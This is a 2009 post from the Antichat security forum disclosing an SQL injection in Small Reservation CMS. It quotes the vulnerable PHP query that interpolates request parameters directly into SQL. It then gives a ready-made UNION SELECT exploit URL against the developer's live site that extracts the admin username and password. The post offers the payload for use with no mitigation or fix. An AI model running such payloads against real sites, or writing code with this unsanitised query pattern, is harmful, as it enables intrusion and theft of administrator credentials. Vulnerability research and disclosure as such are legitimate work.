ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Small Reservation CMS
  #1  
Старый 26.09.2009, 04:39
Аватар для Ded MustD!e
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию Small Reservation CMS

Уязвимость: SQL-Inj
Продукт: Small Reservation CMS
Уязвимый файл MainContent.class.php
Код:
PHP код:
if($res $this->db->query("SELECT rentobject_id,name,marke,
                            weight,power,engine,imgurl
                            FROM tb_
{$this->subcmd}
                            WHERE rentobject_id = 
{$this->id}")) 
Пример на сайте разработчика:
Код:
http://www.fastproject.ch/smallCMS/index.php?pageid=8&rentobject_id=1+union+select+1,concat_ws(0x3a,admin_user,admin_pw),3,4,5,6,7+from+tb_admin--
__________________
Feci, quod potui. Faciant meliora potentes.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Reviews CMS w3r3.w01f PHP, PERL, MySQL, JavaScript 33 12.04.2010 23:18
Как определить вид CMS или форума? Validol Сценарии/CMF/СMS 1 14.09.2009 14:24
10 вещей, которые нужно учитывать при выборе идеальной CMS Andres Статьи 0 27.06.2009 02:38
CMS vs "изготовление на коленках" vadim_samoilov Чужие Статьи 8 19.08.2008 02:10
Девять Комерческих Cms w3r3.w01f PHP, PERL, MySQL, JavaScript 1 21.04.2006 00:27



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ